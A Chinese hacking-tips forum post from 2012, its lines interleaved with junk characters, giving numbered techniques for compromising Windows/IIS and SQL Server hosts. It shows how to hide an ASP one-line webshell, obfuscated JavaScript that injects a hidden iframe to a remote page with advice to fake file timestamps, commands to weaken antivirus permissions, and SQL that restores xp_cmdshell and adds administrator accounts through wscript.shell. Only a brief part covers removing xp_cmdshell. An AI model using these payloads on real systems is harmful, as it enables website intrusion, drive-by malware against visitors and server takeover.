: T5 {* d+ q6 P0 _( U# |53、隐藏ASP后门的两种方法# L5 |6 p8 y4 A) T* v
1、建立非标准目录:mkdir images..\
! U: O5 k0 @# _* ] _2 `" T2 v拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp+ `' I( m1 x, {2 F! i1 U4 N1 s. t
通过web访问ASP木马:http://ip/images../news.asp?action=login
* h( H) {7 A) ]6 n7 C9 z. z, t如何删除非标准目录:rmdir images..\ /s7 E4 W( v5 n9 n
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
4 |6 i8 D, b4 }mkdir programme.asp, Y0 L" A7 M( _/ X
新建1.txt文件内容:<!--#include file=”12.jpg”-->. W& P4 g$ D" ^( R) |1 D
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
) ^1 {* V* Z3 r# |' X: s- V' {2 nattrib +H +S programme.asp4 Z: O7 ^! h4 J
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt( F2 f: M" c/ C
" c: V% F& K, i1 ]0 [
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
; f, E+ _3 Z% ~然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
; i3 O9 |0 i$ e& H) V9 e- R6 I: J2 [
8 ? h; U' R, a; C7 ` ~" v+ k# I55、JS隐蔽挂马
& q2 P: L3 C& o a1.) L# C: N$ l4 V M& O
var tr4c3="<iframe src=ht";
# f; i# ^% Q' T6 A5 k( M5 V+ Btr4c3 = tr4c3+"tp:/";
: n. c |, C0 A9 S# b& W! n5 Str4c3 = tr4c3+"/ww";
a! W! \# w& ^3 Utr4c3 = tr4c3+"w.tr4";6 _. `* g# ^: O# ?/ M2 L. t
tr4c3 = tr4c3+"c3.com/inc/m"; @9 e3 ~# n1 H2 e
tr4c3 = tr4c3+"m.htm style="display:none"></i";$ G; q( W* V% \2 L8 W9 l5 ~; U4 U
tr4c3 =tr4c3+"frame>'";% M6 i& _ q0 [4 R" Y
document.write(tr4c3);
6 X* B/ |$ o" _避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 S% G2 B3 Y* c2 K6 R# f; q* S. W1 M" e" t& L, ?
2.
1 r" H2 K) y) R3 m9 E转换进制,然后用EVAL执行。如! A& i0 b- A& _! |; f$ L/ g
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");6 C7 ]; M+ k$ E" ?' d# T
不过这个有点显眼。& ]+ c- W# F, d
3.* j* G% V T1 A' w- r+ I
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');/ J+ `; T& O9 y% r6 }/ p- u Z
最后一点,别忘了把文件的时间也修改下。1 c* f, Q8 P c, ~
0 D/ c5 k% Y. C& `
56.3389终端入侵常用DOS命令
% {4 b7 a1 `, q3 Ctaskkill taskkill /PID 1248 /t
. A7 r9 s" c: j4 {" b. H9 R/ i
tasklist 查进程, f/ a' p# V' ]3 r8 W3 D
5 H2 w& q3 D, E# b! Q$ H
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
4 z0 Q! x9 _& Piisreset /reboot: g( ?2 k, z. Q; {1 X. ]
tsshutdn /reboot /delay:1 重起服务器/ u, @7 ^- O+ Y2 u+ L6 O
4 D" R/ M9 ^" r7 \5 Plogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
" }1 c2 a* r0 u, c1 U8 a& C& V' J; A. a% S+ Q+ q( ~ n
query user 查看当前终端用户在线情况
; Y! i4 D& T6 E* S9 W& V4 ` e3 v2 x/ D! L( t" b/ _3 y# R
要显示有关所有会话使用的进程的信息,请键入:query process *) e9 B2 Z7 Z) ^( k3 g* }+ X* ^
; [: m2 }2 j _0 i8 u6 l5 w1 F要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
& x/ f& ^- @5 E+ C! L8 V5 w" O0 \" o/ T3 D
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
1 N! G8 q5 R0 h" d3 l, b q! N2 G! S- C/ y- p1 T$ Y8 f
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02! C9 F5 e4 B. Q% t5 w) _0 f$ e
$ @# W' C; q L9 w0 g命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启9 q4 `! \! ]1 `6 W" `/ M# G r
% q, c- x1 ]0 Q9 P; C8 M2 D5 W命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
- r7 ]- S: C2 Y' X' J& @; S) H2 _. o+ J% @9 K$ ~4 Z
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
" z3 L, \ I ~. |; W4 E
; J7 d3 z7 }: C% ?# u' b" }- Y4 k命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
$ b Z; j8 s: ?
) G X, `+ m) S( r' z+ }$ L- k7 a56、在地址栏或按Ctrl+O,输入:
" f$ L# O# m* X# U! m# F, |javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
6 _* J. _' n; s; P
' F7 p& ]. a( D源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
' O6 r7 x0 y& ^' f& O8 m: E2 w3 f
# ?) ]9 `4 V+ R2 l4 C# g" Q57、net user的时候,是不能显示加$的用户,但是如果不处理的话, k+ k9 P, \: A1 o
用net localgroup administrators是可以看到管理组下,加了$的用户的。 Q1 a' s8 d6 u) g2 n
( z/ |" [" q- t$ @. S, v( s58、 sa弱口令相关命令. O0 z1 I. ^% f
2 u6 f& n4 X. g6 [$ D0 W' \! f6 L一.更改sa口令方法:5 I! d, B2 I2 Y% ^$ C/ @
用sql综合利用工具连接后,执行命令:/ ?6 c w8 |8 r* z, T
exec sp_password NULL,'20001001','sa'+ {1 W7 \. K2 F6 U5 {
(提示:慎用!)
7 V, H a, N4 Q8 K o# y
3 E" ^4 [9 R( C# B# k: W二.简单修补sa弱口令.
- {) B; G; c; P$ X. U B2 j2 ~: U: g( b
方法1:查询分离器连接后执行:
0 o! _+ P4 N; B! ?if exists (select * from
$ T+ J4 p' t2 [; Qdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and4 f! h- p, b$ d* v2 l; w( l& p
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)1 v% b6 Z4 n* W5 y7 _' F/ I
6 U5 m8 a+ b) T9 I' K& o% p
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'& K+ [+ Z7 M7 M; w; d
3 ]* w% Z. M, ^8 `! W) pGO
+ r' r1 s4 ]. {9 A4 M% ~1 D* V# N5 j9 B( C
然后按F5键命令执行完毕3 Z5 b5 k, g0 s- a7 C% g. H) s
9 {5 G5 c8 q- I+ a1 O* T! g方法2:查询分离器连接后
2 u/ v* `* Y1 x) H第一步执行:use master6 y @4 Y" x8 V0 ?7 B D6 a8 Y0 I1 h
第二步执行:sp_dropextendedproc 'xp_cmdshell'; J2 L0 @* A5 z" {" M
然后按F5键命令执行完毕
' L$ z2 ~: O0 ?/ b8 U" m9 s3 [' ~. v {' M
[; g6 B0 j# ]三.常见情况恢复执行xp_cmdshell.* ^+ U3 P; \; R& d/ ] j7 H
7 ^6 G" ~% ]+ C
9 V& Z( v5 E2 d+ X+ z
1 未能找到存储过程'master..xpcmdshell'.. ^$ `7 ~/ Z( X( g: J6 H! o
恢复方法:查询分离器连接后,
; V, \% m. Z7 {: k# t6 h, Q5 x7 J第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int1 x3 a# I4 L/ o
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ z: k5 J3 y: h
然后按F5键命令执行完毕
" Q9 f$ X; H7 T6 O% c$ q5 |* t9 e! x# W
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)& K1 d# _6 V) m' _! R% Z7 B/ Z
恢复方法:查询分离器连接后,
) |- I% ^ y7 I/ a, E第一步执行:sp_dropextendedproc "xp_cmdshell"
7 |, U9 C3 ?8 G, B( K9 t9 w第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 ~- x% w# ?! d' {+ u* C然后按F5键命令执行完毕 |, K/ \5 K2 ^6 F( e/ I
; t# b T5 k2 C4 F* S/ w6 o
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
8 x) f+ M# i3 V恢复方法:查询分离器连接后,4 N8 {: f. s# w4 C$ }+ z
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
5 z/ U$ O9 X; m4 \( [* p. O第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' % b. p! M: _5 u" ^9 ?1 t/ b- O% B
然后按F5键命令执行完毕
4 W: @- a2 d4 Z
( m: N7 h" \$ @% M) L( P! A+ E; ?四.终极方法.9 g! y8 t7 x2 z2 q! x% u |
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:. V+ e" J* j* |4 F
查询分离器连接后,
: c5 w% N# R/ A$ \ ~2000servser系统:
/ B$ Y4 F' e2 |( A o! Y2 hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add') s; o- i3 p% x8 {# s8 z8 I
, b' H0 H% w G% W. pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
' {; `7 {4 P ~5 A$ c
7 v7 B! \2 c- @xp或2003server系统:
6 N! B6 r; w5 Y2 c8 X$ r4 j3 K( |0 }' K4 Z) n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
_; D- e- ?4 O1 r* p8 s
+ _- g* U( K9 ~- q& xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
& I2 P4 A5 v+ H8 g3 e; k |
发表于 2012-9-15 14:51:03
收藏
支持
反对